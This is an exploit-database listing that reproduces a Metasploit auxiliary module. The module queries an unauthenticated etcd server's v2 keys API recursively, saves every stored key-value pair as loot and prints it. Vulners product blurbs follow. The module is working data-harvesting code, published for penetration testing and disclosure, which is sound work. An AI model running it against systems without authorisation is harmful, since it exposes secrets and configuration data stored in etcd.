Lucene search
K

Etcd Keys API Information Gathering

🗓️ 31 Aug 2024 00:00:00Reported by h00die, Giovanni Collazo, metasploit.comType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 191 Views

Etcd Keys API Information Gathering module for Metasploit. Queries etcd API to retrieve all key value pairs. Etcd does not use authentication by default.

Code
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Etcd  
include Msf::Auxiliary::Scanner  
  
def initialize  
super(  
'Name' => 'Etcd Keys API Information Gathering',  
'Description' => %q(  
This module queries the etcd API to recursively retrieve all of the stored  
key value pairs. Etcd by default does not utilize authentication.  
),  
'References' => [  
['URL', 'https://gcollazo.com/the-security-footgun-in-etcd/']  
],  
'Author' => [  
'Giovanni Collazo <[email protected]>', # discovery  
'h00die' # msf module  
],  
'License' => MSF_LICENSE,  
'DisclosureDate' => "Mar 16 2018"  
)  
end  
  
def run_host(_target_host)  
path = normalize_uri(target_uri.to_s, 'v2/keys/?recursive=true')  
  
banner = fingerprint_service(target_uri.to_s)  
vprint_status("#{peer} - Collecting data through #{path}...")  
res = send_request_raw(  
'uri' => path,  
'method' => 'GET'  
)  
  
# parse the json if we got a good request back  
if res && res.code == 200  
begin  
response = res.get_json_document  
store_loot('etcd.data', 'text/json', rhost, response, 'etcd.keys', 'etcd keys')  
rescue JSON::ParserError => e  
print_error("Failed to read JSON: #{e.class} - #{e.message}}")  
return  
end  
print_good("#{peer}\nVersion: #{banner}\nData: #{JSON.pretty_generate(response)}")  
elsif res  
vprint_errord("Invalid response #{res.code} for etcd open keys response")  
return  
else  
verbose_error("No response for etcd open keys probe")  
return  
end  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation